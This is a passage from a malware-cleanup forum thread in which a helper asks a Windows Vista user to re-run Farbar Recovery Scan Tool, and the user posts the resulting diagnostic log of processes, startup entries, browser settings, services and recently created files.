[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\shopathome.com

***** [ Web browsers ] *****

[-] [C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\prefs.js] [Preference] Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 0);

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [11675 bytes] ##########
 

Link to post
Share on other sites

The internet connection seems all fixed now. So thats good.

However, on startup the Pc always displays this error message:

------------------------------------------------------------------

RunDLL

Error loading\3\LXCYtime.dll

The specified module could not be found

-------------------------------------------------------------

FYI it was already doing this before you helped me, ever since the initial MB scan

Although i believe it might list different file names sometimes

Link to post
Share on other sites

FRST.gif Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.

    (XP users click run after receipt of Windows Security Warning - Open File).

  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content into your next reply.
Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016
Ran by Barbara (administrator) on BARBARA-PC (30-01-2016 12:34:53)
Running from C:\Users\Barbara\Desktop
Loaded Profiles: Barbara (Available Profiles: Barbara)
Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agr64svc.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
(Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor)
HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation)
HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry
HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA)
HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA)
HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1    mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C}
SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -  No File
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441
FF DefaultSearchEngine.US: Default
FF SelectedSearchEngine: Default
FF Homepage: hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghGI10AUlsSGRgWeA8NTA0QF1cOIV9dUxQTQ1FBJg4LBVtEEAQFIk0FA18DB0VXfWFoKB8fHGZGIUtbCW4UQ35NL04=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.)
FF SearchPlugin: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\searchplugins\default.xml [2016-01-30]
FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA)
R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( )
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed]
R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation)
R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed]
R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. )

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-27 03:10 - 2016-01-27 03:13 - 00000000 ____D C:\AdwCleaner
2016-01-27 03:10 - 2016-01-26 20:05 - 01507840 _____ C:\Users\Barbara\Desktop\AdwCleaner.exe
2016-01-26 03:07 - 2016-01-26 03:10 - 00045370 _____ C:\Users\Barbara\Desktop\Addition.txt
2016-01-26 03:06 - 2016-01-30 12:35 - 00018814 _____ C:\Users\Barbara\Desktop\FRST.txt
2016-01-26 03:04 - 2016-01-30 12:34 - 00000000 ____D C:\FRST
2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe
2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt
2016-01-23 17:05 - 2016-01-29 17:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo
2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm
2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll
2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D}
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1
2016-01-23 16:10 - 2016-01-30 12:36 - 00000270 _____ C:\Windows\Tasks\PubMach138.job
2016-01-23 16:10 - 2016-01-29 17:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job
2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519
2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer
2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806
2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6
2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138
2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
